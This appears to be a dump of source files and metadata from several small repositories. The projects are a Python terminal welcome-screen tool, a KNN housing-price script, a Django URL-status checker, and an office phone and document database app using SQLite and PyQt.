\"magenta\": \"\\x1b[35m\",\n \"cyan\": \"\\x1b[36m\",\n \"white\": \"\\x1b[37m\",\n \"light black\": \"\\x1b[90m\",\n \"light red\": \"\\x1b[91m\",\n \"light green\": \"\\x1b[92m\",\n \"light yellow\": \"\\x1b[93m\",\n \"light blue\": \"\\x1b[94m\",\n \"light magenta\": \"\\x1b[95m\",\n \"light cyan\": \"\\x1b[96m\",\n \"light white\": \"\\x1b[97m\"\n }\n while True:\n valid_options = option_value[1:-1].split('/')\n new_value = input(LIGHT.red + \"Enter [TAB] to go back\\nEnter your new value %s: \" % option_value +\n LIGHT.yellow)\n if new_value == \"\\t\":\n break\n if (any(option in new_value for option in valid_options) and\n option_value != \"(<percent/values/both>, <GB/MiB>)\") or option_value == \"(anything/[ENTER])\":\n config_data[key] = new_value\n break\n elif option_value == \"(color)\":\n if any(color in new_value for color in list(COLORS.keys())):\n config_data[key] = new_value\n break\n else:\n print(NORMAL.red +\n \"\\nWrong color, see the following valid colors:\")\n all_colors = []\n for color in list(COLORS.keys()):\n all_colors.append(\n COLORS[color] + \"[\" + color + \"]\" + END)\n normal_colors = all_colors[0:8]\n light_colors = all_colors[8:]\n for i in range(int(len(all_colors) / 2)):\n print(light_colors[i] + \"\\t\" +\n normal_colors[i], end='\\n')\n print()\n elif option_value == \"(number)\":\n try:\n config_data[key] = int(new_value)\n break\n except ValueError:\n print(NORMAL.red + \"\\nERROR: Not a number\\n\" + END)\n elif option_value == \"(<percent/values/both>, <GB/MiB>)\":\n arrayed_option = option_value[1:-1].split(', ')\n arrayed_option = [arrayed_option[i]\n [1:-1].split('/') for i in range(2)]\n user_option = new_value[1:-1].split(', ') \\\n if any(bracket in new_value for bracket in ['[', ']']) else new_value.split(', ')\n if len(user_option) > 1:\n if (user_option[0] in arrayed_option[0]) and (user_option[1] in arrayed_option[1]):\n config_data[key] = user_option\n break\n else:\n print(NORMAL.red + \"\\n1 or more of the options \" + LIGHT.red +\n \"[%s, %s]\" % (user_option[0], user_option[1]) + NORMAL.red +\n \" dont match the suggested options\\n\" + END)\n else:\n print(NORMAL.red +\n \"\\nNot enough options added. Type the 2 suggested options separated by a comma\\n\" +\n END)\n else:\n print(NORMAL.red + \"\\nERROR: Wrong choice, see options in brackets\\n\")\n if new_value != \"\\t\":\n if str(value).find(\"[\") != -1 and new_value.find(\"[\") == -1:\n new_value = \"[\" + new_value + \"]\"\n print(LIGHT.green + key + \": \" + LIGHT.yellow + new_value + END)\n else:\n print(LIGHT.magenta + \"\\nGoing back to selection menu...\" + END)\n print(\"\\n--- --- --- --- --- ---\")\n with open(json_path, 'w') as config_file:\n for k in list(config_data.keys()):\n if config_data[k] == \"true\":\n config_data[k] = True\n if config_data[k] == \"false\":\n config_data[k] = False\n if config_data[k] == \"null\":\n config_data[k] = None\n dump(config_data, config_file, indent=4)\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n if sys.argv[1] == \"init\":\n try:\n setup_lewel()\n except KeyboardInterrupt:\n print(LIGHT.red + \"\\n\\nYou've quit the application\" + END)\n sys.exit(0)\n elif sys.argv[1] == \"reset\":\n abs_plew = os.path.join(main_directory, shadow_image)\n abs_json = os.path.join(main_directory, \".assist/details.json\")\n try:\n os.remove(abs_plew)\n except FileNotFoundError:\n print(LIGHT.red + \"Image doesn't exist... trying other\\n\" + END)\n try:\n os.remove(abs_json)\n except FileNotFoundError:\n print(LIGHT.red +\n \"Detail metadata doesn't exist... trying other\\n\" + END)\n print(LIGHT.red + \"You've reseted your application. Use \" +\n LIGHT.green + \"lewel init\" + LIGHT.red + \" to initialize your welcome screen\" + END)\n elif sys.argv[1] == \"config\":\n from subprocess import call\n if len(sys.argv) == 3:\n if sys.argv[2] == \"vim\":\n call([\"vim\", json_path])\n elif sys.argv[2] == \"open\":\n call([\"open\", json_path])\n else:\n try:\n config_lewel()\n except KeyboardInterrupt:\n print(NORMAL.red + \"\\n\\nYou've quit the application\" + END)\n sys.exit(0)\n elif sys.argv[1] == \"help\":\n abs_help = os.path.join(main_directory, \".assist/.help\")\n from subprocess import call\n call([\"cat\", abs_help])\n else:\n print(LIGHT.red + \"The command \" +\n LIGHT.green + \"lewel <%s> \" % sys.argv[1] +\n LIGHT.red + \"doesn't exist. Try running \" +\n LIGHT.green + \"lewel help\" +\n LIGHT.red + \" for a list of valid commands\" + END)\n else:\n run_lewel()\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6558823585510254, "avg_line_length": 21.66666603088379, "blob_id": "d77bf687f01b7a57ff417211615db39a30d924e9", "content_id": "f4acde3506ca0051108c8e9239e8aad78da31a43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 73, "num_lines": 15, "path": "/setup.py", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\nfrom package import Package\n\nsetup(\n name='lewel',\n description='simple welcome screen and diagnostic program for shell',\n version='1.0',\n license='MIT',\n author='donovan',\n author_email='[email protected]',\n packages=find_packages(),\n cmdclass={\n \"package\": Package\n }\n)\n" }, { "alpha_fraction": 0.49696528911590576, "alphanum_fraction": 0.5365380048751831, "avg_line_length": 29.511110305786133, "blob_id": "1d23b36cb180cc4373c7e5d736d6a3a7f76101ce", "content_id": "76324e78be4af4d13a781050ba6eb3a653538f12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4119, "license_type": "no_license", "max_line_length": 81, "num_lines": 135, "path": "/bin/imager.py", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "import sys\n\n\nclass LIGHT:\n black = \"\\x1b[90m\"\n red = \"\\x1b[91m\"\n green = \"\\x1b[92m\"\n white = \"\\x1b[97m\"\n\n\nEND = \"\\x1b[0m\"\npixel_row = \"\"\npixel_rows = []\n\n\ndef reproduce_image(path_to_img): # create img array\n from PIL import Image\n try:\n image = Image.open(path_to_img)\n except FileNotFoundError:\n exit(LIGHT.red + \"\\n!!! Image doesn\\'t exist, check for error !!!\" + END)\n image = image.resize((50, 20), Image.ANTIALIAS)\n image.save(\"new.png\")\n\n\ndef create_image(path_to_img, width, height): # create img array\n from PIL import Image\n from numpy import asarray\n try:\n image = Image.open(path_to_img)\n except FileNotFoundError:\n exit(LIGHT.red + \"\\n!!! Image doesn\\'t exist, check for error !!!\" + END)\n image = image.resize((width, height), Image.ANTIALIAS) # (w,h)\n return asarray(image)\n\n\ndef rgb_xterm(r, g, b): # converts RGB to xterm 256\n if r == g == b:\n if r < 8:\n return str(16)\n if r > 248:\n return str(231)\n return str(round(((r - 8) / 247) * 24) + 232)\n return str(16 + (36 * round(r / 255 * 5)) +\n (6 * round(g / 255 * 5)) +\n round(b / 255 * 5))\n\n\ndef rgb_xterm_array(r, g, b): # converts RGB to xterm RGB values\n if r == g == b:\n if r < 8:\n return str(16)\n if r > 248:\n return str(231)\n return str(round(((r - 8) / 247) * 24) + 232)\n return [\n 16 + (36 * round(r / 255 * 5)),\n (6 * round(g / 255 * 5)),\n round(b / 255 * 5)\n ]\n\n\ndef print_image(image): # prints image pixels\n rows, columns, _ = image.shape\n global pixel_row\n for x in range(rows):\n print(' ', end='')\n for y in range(columns):\n r, g, b = image[x][y]\n pixel_row += \"\\x1b[48;5;{}m \\x1b[0m\".format(\n str(rgb_xterm(r, g, b)))\n print(pixel_row, end='', flush=True)\n pixel_row = \"\"\n print('')\n\n\ndef write_image(image): # write img to output file\n import os\n rows, columns, _ = image.shape\n global pixel_row\n global pixel_rows\n abs_path = os.path.join(os.path.dirname(__file__), \".assist/.plew\")\n with open(abs_path, \"w\") as file:\n for x in range(rows):\n for y in range(columns):\n r, g, b = image[x][y]\n pixel_row += \"\\x1b[48;5;{}m \\x1b[0m\".format(rgb_xterm(r, g, b))\n pixel_rows.append(pixel_row)\n pixel_row = \"\"\n file.write('\\n'.join(pixel_rows))\n\n\ndef read_image(output_file): # read output file\n with open(output_file, \"r\") as file:\n print(file.read())\n\n\ndef print_256(): # show all 256 colors\n for i in range(256):\n print(\"\\x1b[48;5;%dm %d \\x1b[0m|\" % (i, i), end='')\n print()\n\n\nif __name__ == '__main__' and len(sys.argv) == 3:\n file = sys.argv[2]\n if sys.argv[1] == \"read\":\n read_image(file)\n elif sys.argv[1] == \"write\":\n write_image(create_image(file, sys.argv[3], sys.argv[4]))\n elif sys.argv[1] == \"print\":\n print_image(create_image(file, sys.argv[3], sys.argv[4]))\n elif sys.argv[1] == \"reproduce\":\n reproduce_image(file)\n elif sys.argv[1] == \"matrix\":\n import numpy\n numpy.set_printoptions(threshold=sys.maxsize)\n print(create_image(file, sys.argv[3], sys.argv[4])) # > matrix.txt\n elif sys.argv[1] == \"rgb256\":\n r, g, b = map(int, sys.argv[2].split(','))\n print(r, g, b)\n print(rgb_xterm_array(r, g, b))\n print(rgb_xterm(r, g, b))\nelif len(sys.argv) == 2 and sys.argv[1] == \"showall\":\n print_256()\n\n\n\"\"\" ANSI Escape Code: https://notes.burke.libbey.me/ansi-escape-codes/\n \\x1b[48;5;{}m \\x1b[0m\n \\x1b[ - call function\n 48;5;{} - function parameters... 48;5;{} set bg to {}\n m - function name... m: set graphic\n 48;5;{}m - function example: m(48, 5, {})\n \\x1b[0m - function m(0) to turn off control sequence\n The space between the beginning and ending control sequences\n includes space character to color just the background \"\"\"\n" } ]
6
kenantr37/K-Nearest-Neighbors
https://github.com/kenantr37/K-Nearest-Neighbors
a410cfe29cdb2263a43bf9e30e115cbcc047e492
339fc1fafd714cadd4a75e5c1451447faf96a955
28686b8ea605b4d96ee7bc35b04adc3c38357fdb
refs/heads/main
2023-02-13T09:07:15.182509
2021-01-04T19:49:11
2021-01-04T19:49:11
326,785,489
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7302185297012329, "alphanum_fraction": 0.7980406880378723, "avg_line_length": 93.78571319580078, "blob_id": "f004b326283ac031b6e4afe9b7b456453d6d3a42", "content_id": "909556e4f22547b2578595b89f99d2d39c1eb930", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1327, "license_type": "no_license", "max_line_length": 464, "num_lines": 14, "path": "/README.md", "repo_name": "kenantr37/K-Nearest-Neighbors", "src_encoding": "UTF-8", "text": "# K-Nearest Neighbors\n### A short summary of the K-Nearest Neighbors Algorithm\nKNN is called \"the simplest algorithm\" machine learning algorithm used for classification and regression.The algorithm makes predictions by calculating similarity between the input sample and each training instance. It calculates the distance between the new instance and it's neighbors and then decide the class of this instance from K nearest neighbors.\n\n### Summary for my simple project\nIn my sample, there is a dataset which is about California Housing Prices I downloaded from Kaggle. Despite of the prediction, I wanted to look at accuracy of the prediction but as I saw, accuracy of the prediction could be off from high accuracy score when features' amount would be large. This is because, I could get much more proper accuracy from less rows features and in my project's dataset there are 20433 rows. Probably it's my mistake but I'm learning :)\n\n#### This is my sample with 20433 lines rows : \n\n![Screenshot_1](https://user-images.githubusercontent.com/44119225/103572495-bb2d9e00-4edd-11eb-8b44-713e2679c33d.jpg)\n\n#### and this is my previous sample which has 500 lines rows . Prediction accuracy is quite normal :)\n\n![Screenshot_2](https://user-images.githubusercontent.com/44119225/103572709-1495cd00-4ede-11eb-94c2-0037a2b25894.jpg)\n" }, { "alpha_fraction": 0.7179356217384338, "alphanum_fraction": 0.7353091239929199, "avg_line_length": 47.95000076293945, "blob_id": "de5666cc2c1a587c6ab2ddc9853e5a51cd6a78c5", "content_id": "60a05d82df1c3663da73005df4e565a5fbf19b05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1957, "license_type": "no_license", "max_line_length": 107, "num_lines": 40, "path": "/housing_prices_sample.py", "repo_name": "kenantr37/K-Nearest-Neighbors", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 4 11:32:14 2021\n\n@author: Zeno\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split # to split the data as test and train\nfrom sklearn.preprocessing import StandardScaler # to normalize the data\nfrom sklearn.neighbors import KNeighborsClassifier # to create KNN model\n# I wanted to predict median_house_value by using other features with KNN algorithm\ndata = pd.read_csv(\"D:/Machine Learning Works/K-Neirest Neighbour (KNN)/housing.csv\")\ndata.dropna(inplace = True) # There are a few NaN values our features\ndata.drop([\"ocean_proximity\"],axis = 1,inplace = True) # I drop the last column 'cause I won't use it\n# y is median_house_value\ny = data.median_house_value\n# x is other features\nx = data.drop([\"median_house_value\"],axis = 1 ,inplace = False)\n# Now, we can normalize x features' values'\nx_normalized = StandardScaler().fit(x).transform(x)\n# splitting data as train and test\nx_test,x_train,y_test,y_train = train_test_split(x,y,test_size = 0.2,random_state = 1 )\n# Let's create KNN model\n# I decided 3 neighbours for initial value but I'll look which value is much more proper for neigbour value\nknn_model = KNeighborsClassifier(n_neighbors = 3).fit(x_train,y_train)\n# for the last thing, we can look at the score of the accuracy\nprint(\"for neighbour value is {}, score is {} \".format(3,knn_model.score(x_test,y_test)))\n# We need to find the best n value and for this we could make a loop\naccuracy_score=[] #to see which n value is better\nfor each in range(500,509):\n knn_model_2 = KNeighborsClassifier(n_neighbors=each).fit(x_train,y_train)\n prediction_2 = knn_model_2.predict(x_test)\n print(\"when n is {}, score is {} \".format(each,knn_model_2.score(x_test,y_test)))\n accuracy_score.append(knn_model_2.score(x_test,y_test))\nplt.plot(range(1,10),accuracy_score)\nplt.xlabel(\"range\")\nplt.ylabel(\"accuracy\")\nplt.show()" } ]
2
kairok/Django-Url-Status
https://github.com/kairok/Django-Url-Status
240efbb8bfc926e493220fb3bbe2d2fd892eec14
c1f9743aaeab95dbf01955ff3fe7e160663664bc
550e71a9e0a7c89f1b481bfedfe626c7e3256ef0
refs/heads/master
2020-04-07T02:30:13.174710
2018-11-17T11:54:03
2018-11-17T11:54:03
157,979,147
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5443786978721619, "alphanum_fraction": 0.6745561957359314, "avg_line_length": 18.875, "blob_id": "3d5bbd568b4d6e5a3c3a8b56cc2ffd49c8550a26", "content_id": "aa22f5cb05964f88c5b0a901942d30d9cc58a03a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 169, "license_type": "no_license", "max_line_length": 43, "num_lines": 8, "path": "/readme.md", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "Django 1.9 Site\r\n\r\nSite check URL status code\r\n\r\n http://127.0.0.1:8000/post/\r\nDjango admin http://127.0.0.1:8000/admin/\r\n\r\nUser default admin password qwerty123\r\n\r\n" }, { "alpha_fraction": 0.7528089880943298, "alphanum_fraction": 0.7528089880943298, "avg_line_length": 16.799999237060547, "blob_id": "bc62f0c1ea0477444eec3f26af182c6adf2f7fa1", "content_id": "c2e0ef6c650b36dafd2e972196d88c2bf998276c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/Urllist/apps.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass UrllistConfig(AppConfig):\n name = 'Urllist'\n" }, { "alpha_fraction": 0.7030651569366455, "alphanum_fraction": 0.7088122367858887, "avg_line_length": 25.100000381469727, "blob_id": "8d055740953ba0a57cf307f2dda7c258cbfbf740", "content_id": "bb6c0d32be2ad4cdb54e7a88d8ba79d51bca1b8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 522, "license_type": "no_license", "max_line_length": 87, "num_lines": 20, "path": "/Urllist/models.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nfrom django.contrib.auth.models import User\n# from djoser.urls.base import User\n\n\n\nclass Links(models.Model):\n # Model Rooms\n\n creater = models.ForeignKey(User, verbose_name=\"Creater\", on_delete=models.CASCADE)\n url = models.CharField(\"URLS\", max_length=200)\n status=models.IntegerField()\n date = models.DateTimeField(\"Date created\", auto_now_add=True)\n\n\n class Meta:\n verbose_name=\"Link status\"\n verbose_name_plural=\"Links status\"\n" }, { "alpha_fraction": 0.6811145544052124, "alphanum_fraction": 0.6811145544052124, "avg_line_length": 22.14285659790039, "blob_id": "6e3d0c00ab8bd33c6c60347c0e7d488299b26f53", "content_id": "5e7e292d09dd2e5184fecfdb45de013cc0ef7d01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 334, "license_type": "no_license", "max_line_length": 72, "num_lines": 14, "path": "/Urllist/admin.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom Urllist.models import Links\n\n\nclass LinksAdmin(admin.ModelAdmin):\n \"\"\"Комнаты чата\"\"\"\n list_display = (\"creater\", \"url\", \"date\")\n\n #def invited_user(self, obj):\n # return \"\\n\".join([user.username for user in obj.invited.all()])\n\n\n\nadmin.site.register(Links, LinksAdmin)" }, { "alpha_fraction": 0.7160000205039978, "alphanum_fraction": 0.7160000205039978, "avg_line_length": 26.77777862548828, "blob_id": "47127b5839ceb8c6cd77b7b53ef843a7cb60302c", "content_id": "a6afd2459eeb7178d9b38af4a5abdf1bcc412e17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/Loginsys/urls.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n#from django.urls import path\nfrom django.conf.urls import include, url\nfrom Loginsys import views\n\nurlpatterns = [\n url(r'^login/', views.login, name='Login'),\n url(r'^logout/', views.logout, name='Logout'),\n]\n" }, { "alpha_fraction": 0.5809617042541504, "alphanum_fraction": 0.5986260771751404, "avg_line_length": 32.96666717529297, "blob_id": "bdd4a952439d5e9f45f1f019d73f9a2f74ce3910", "content_id": "43c07ba11b8fe4f0d083aad7c78f1db02cf14558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1019, "license_type": "no_license", "max_line_length": 145, "num_lines": 30, "path": "/UrlStatus/migrations/0001_initial.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.3 on 2018-11-15 15:09\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Links',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('url', models.CharField(max_length=200, verbose_name='URLS')),\n ('date', models.DateTimeField(auto_now_add=True, verbose_name='Date created')),\n ('creater', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Creater')),\n ],\n options={\n 'verbose_name': 'Link status',\n 'verbose_name_plural': 'Links status',\n },\n ),\n ]\n" }, { "alpha_fraction": 0.7217044234275818, "alphanum_fraction": 0.7263648509979248, "avg_line_length": 27.903846740722656, "blob_id": "cb93c999655356148004be988b05014689b1176b", "content_id": "d9b3b0e5ed4a11a4ed73c1ce8031d8a98e43bdd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1502, "license_type": "no_license", "max_line_length": 91, "num_lines": 52, "path": "/Urllist/views.py", "repo_name": "kairok/Django-Url-Status", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom django.shortcuts import render, render_to_response\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nimport os\nfrom django.conf import settings\nfrom django.http import HttpResponse\n\nfrom django.views.generic.detail import DetailView\nfrom django.http import FileResponse\nfrom django.http import Http404\n# Create your views here.\nfrom .models import Links\nfrom datetime import datetime\n#from pytz import timezone\nfrom django.utils import timezone\nfrom django.contrib import auth\nimport urllib.request\nimport requests\n\n\ndef index(request):\n\n if len(auth.get_user(request).username)==0:\n return render_to_response('index.html')\n clients = Links.objects.filter(creater=auth.get_user(request))\n check_status(clients)\n clients = Links.objects.filter(creater=auth.get_user(request))\n\n data = {\"clients\": clients, \"username\": auth.get_user(request)} #, \"group\":clientsgroup\n return render(request, \"index.html\", context=data)\n\n\ndef check_status(clients):\n #clients = Links.objects.filter(creater=auth.get_user(client))\n\n for userl in clients:\n URL = userl.url\n #response = urllib.request.urlopen(URL)\n try:\n response = requests.get(URL)\n print(response.status_code)\n status=response.status_code\n except:\n status=404\n\n updated_rows = Links.objects.filter(id=userl.id).update(status=status)\n\n\n return" } ]
7
topliugang/oa
https://github.com/topliugang/oa
2e9876176cc830404b840323c66a011168ba8067
d5492d946281809db8274d31e2a112a2fb049f69
1ae1635fb4281e507554723b3a8225730dd0952c
refs/heads/master
2021-01-13T00:33:52.053703
2017-02-24T06:45:18
2017-02-24T06:45:18
81,397,002
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7136812210083008, "alphanum_fraction": 0.7193229794502258, "avg_line_length": 17.153846740722656, "blob_id": "1af6b9083ccec78e89f0104bac48d961927bb80f", "content_id": "231ae4e89fcbdab2d791fa590a7a587efaf223a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 781, "license_type": "no_license", "max_line_length": 38, "num_lines": 39, "path": "/oa/create_table.sql", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "drop table if exists room;\ndrop table if exists staff;\n\n\n\ncreate table room(\n\tid integer primary key,\n\tnum text,\n\tdepartment text,\n\ttel text,\n\ttel2 text,\n\tlittletel text, \n\tlittletel2 text\n);\n\ncreate table staff(\n\tid integer primary key,\n\tname text,\n\troom_id integer,\n\tcellphone text,\n\tcellphone2 text,\n\tlittlephone text, \n\tlittlephone2 text,\n\tipaddress text\n);\n\ncreate table document(\n\tid integer primary key autoincrement,\n\tserial_number integer, -- 顺序号\n\treceived_date date, -- 收文日期\n\tfrom_department text, -- 来文机关\n\tdocument_number text, -- 文件号码\n\tsecret_degree text, -- 秘密程度\n\tdocument_date date, -- 文件日期\n\tdocument_name text, -- 文件名称\n\tcopy integer, -- 份数\n\tto_staff text, -- 交办人\n\trecycle_date date -- 收回日期\n);\n\n" }, { "alpha_fraction": 0.6278026700019836, "alphanum_fraction": 0.6457399129867554, "avg_line_length": 19.363636016845703, "blob_id": "c57c0795371856b244baf117538963b0e644c4fe", "content_id": "cd083388c8f8f657e31c5e6cfe84ef8fc7d697be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 32, "num_lines": 11, "path": "/oa/fuck_qt.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "import sys\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n dialog = QDialog()0\n dialog.show()\n sys.exit(app.exec_())" }, { "alpha_fraction": 0.6379234194755554, "alphanum_fraction": 0.6467223763465881, "avg_line_length": 28.921052932739258, "blob_id": "9400ae9786191b49e4d9d3553bbec19c13db4bf3", "content_id": "c94967a1ca4bc5d24d727e7b7746d5a3647cacaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2273, "license_type": "no_license", "max_line_length": 103, "num_lines": 76, "path": "/oa/fuck_print.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QScrollArea, QAction, QMenu\nfrom PyQt5.QtGui import QPalette, QImage, QPixmap, QPainter\n\n\nfrom PyQt5.QtPrintSupport import QPrinter, QPrintDialog\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n self.printer = QPrinter()\n\n self.imageLabel = QLabel()\n self.imageLabel.setBackgroundRole(QPalette.Base)\n self.imageLabel.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)\n\n #self.scrollArea =QScrollArea()\n #self.scrollArea.setBackgroundRole(QPalette.Dark)\n #self.scrollArea.setWidget(self.imageLabel)\n \n\n #self.setCentralWidget(self.scrollArea)\n self.setCentralWidget(self.imageLabel)\n\n self.image = QImage('lifecycle.png')\n self.imageLabel.setPixmap(QPixmap.fromImage(self.image))\n\n\n self.createActions()\n self.createMenus()\n\n self.setWindowTitle('fuckprint')\n self.resize(self.image.width(), self.image.height())\n\n self.printimg()\n\n def printimg(self):\n self.printer.setPageSize(QPrinter.A4)\n self.printer.setPageMargins(0, 0, 0, 0, QPrinter.Millimeter)\n\n print type(QPrinter.A4)\n\n dialog = QPrintDialog(self.printer, self)\n if dialog.exec_():\n painter = QPainter(self.printer)\n width = painter.window().width()\n height = painter.window().height()\n #width2 = self.printer.width()\n #height2 = self.printer.height()\n\n #painter.drawLine(0, 0, , )\n\n painter.drawText(200, 200, 'heheheheheh')\n\n\n def createActions(self):\n self.printAction = QAction('&Print...', self, shortcut='Ctrl+P', triggered=self.printimg)\n self.exitAction = QAction('&Exit...', self, shortcut='Ctrl+Q', triggered=self.close)\n\n def createMenus(self):\n self.fileMenu = QMenu('&File', self)\n self.fileMenu.addAction(self.printAction)\n self.fileMenu.addAction(self.exitAction)\n\n self.menuBar().addMenu(self.fileMenu)\n\n\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n mainWin = MainWindow()\n mainWin.show()\n sys.exit(app.exec_())" }, { "alpha_fraction": 0.5663145780563354, "alphanum_fraction": 0.5751173496246338, "avg_line_length": 17.322580337524414, "blob_id": "b9c813228ad71dae8e834a7c82f62b72f54d08ff", "content_id": "a6a624c6a39fd93eac70a2c51c01f9e9d3735f05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1704, "license_type": "no_license", "max_line_length": 89, "num_lines": 93, "path": "/oa/PhoneNumber/dialog.cpp", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "#include \"dialog.h\"\n#include \"ui_dialog.h\"\n\n#include<QSqlDatabase>\n#include<QSqlQuery>\n#include<QDebug>\n\n\nbool Dialog::connect_db()\n{\n QSqlDatabase db = QSqlDatabase::addDatabase(\"QSQLITE\");\n db.setDatabaseName(\"C:\\\\develop\\\\oa\\\\oa\\\\database.db\");\n if (db.open())\n {\n qDebug()<<\"open db success!\";\n }\n else\n {\n qDebug()<<\"open db failed!\";\n }\n}\n\nQString Dialog::query_room(QString num)\n{\n QString ret ;\n\n QSqlQuery query;\n query.prepare(\"select department from room where littletel=:lt1 or littletel2=:lt2\");\n query.bindValue(\":lt1\", num);\n query.bindValue(\":lt2\", num);\n query.exec();\n\n if(query.first())\n {\n ret = query.value(\"department\").toString();\n }\n return ret;\n}\n\nQString Dialog::query_staff(QString num)\n{\n QString ret ;\n\n QSqlQuery query;\n query.prepare(\"select name from staff where littlephone=:lp1 or littlephone2=:lp2\");\n query.bindValue(\":lp1\", num);\n query.bindValue(\":lp2\", num);\n query.exec();\n\n if(query.first())\n {\n ret = query.value(\"name\").toString();\n }\n return ret;\n}\n\nDialog::Dialog(QWidget *parent) :\n QDialog(parent),\n ui(new Ui::Dialog)\n{\n ui->setupUi(this);\n connect_db();\n\n\n}\n\nDialog::~Dialog()\n{\n delete ui;\n}\n\nvoid Dialog::on_numberLineEdit_textChanged(const QString &arg1)\n{\n qDebug()<<\"==============================\";\n qDebug()<<\"arg1: \"<<arg1;\n\n QString department = query_room(arg1);\n if (!department.isEmpty())\n {\n ui->nameLabel->setText(department);\n }\n else\n {\n QString name = query_staff(arg1);\n if (!name.isEmpty())\n {\n ui->nameLabel->setText(name);\n }\n }\n\n\n\n}\n" }, { "alpha_fraction": 0.6064981818199158, "alphanum_fraction": 0.6064981818199158, "avg_line_length": 33.625, "blob_id": "230b546a450e15a226d37841c85c89cf4a2eec5d", "content_id": "35a998f8ca812bc456f6c21ac9ead07e8c469c25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 77, "num_lines": 8, "path": "/oa/obj.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "class Staff:\n def __init__(self, id, name, room_id, cellphone, littlephone, ipaddress):\n self.id = id\n self.name = name\n self.room_id = room_id\n self.cellphone = cellphone\n self.littlephone = littlephone\n self.ipaddress = ipaddress\n" }, { "alpha_fraction": 0.647962212562561, "alphanum_fraction": 0.6597755551338196, "avg_line_length": 19.658536911010742, "blob_id": "119d361dcf8b8e57bae742ec455ff7f49417f55c", "content_id": "efd223248d9bd7340581a1c637acc42fac64bc51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1693, "license_type": "no_license", "max_line_length": 85, "num_lines": 82, "path": "/oa/lib_of_db_and_xls.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "import xlrd\nimport sqlite3\nimport datetime\nfrom obj import Staff\n\t\nxls_file_name = 'database.xlsx'\ndb_file_name = 'database.db'\nsql_script = 'create_table.sql'\n\ndef create_table():\n\twith open(sql_script) as sql_script_file:\n\t\tcon = sqlite3.connect(db_file_name)\n\t\tcur = con.cursor()\n\t\tcur.executescript(sql_script_file.read())\n\t\tcon.commit()\n\t\tcon.close()\n\ndef insert(sql, data = None):\n\t#with open(sql_script) as sql_script_file:\n\tcon = sqlite3.connect(db_file_name)\n\tcur = con.cursor()\n\tif data:\n\t\tcur.execute(sql, 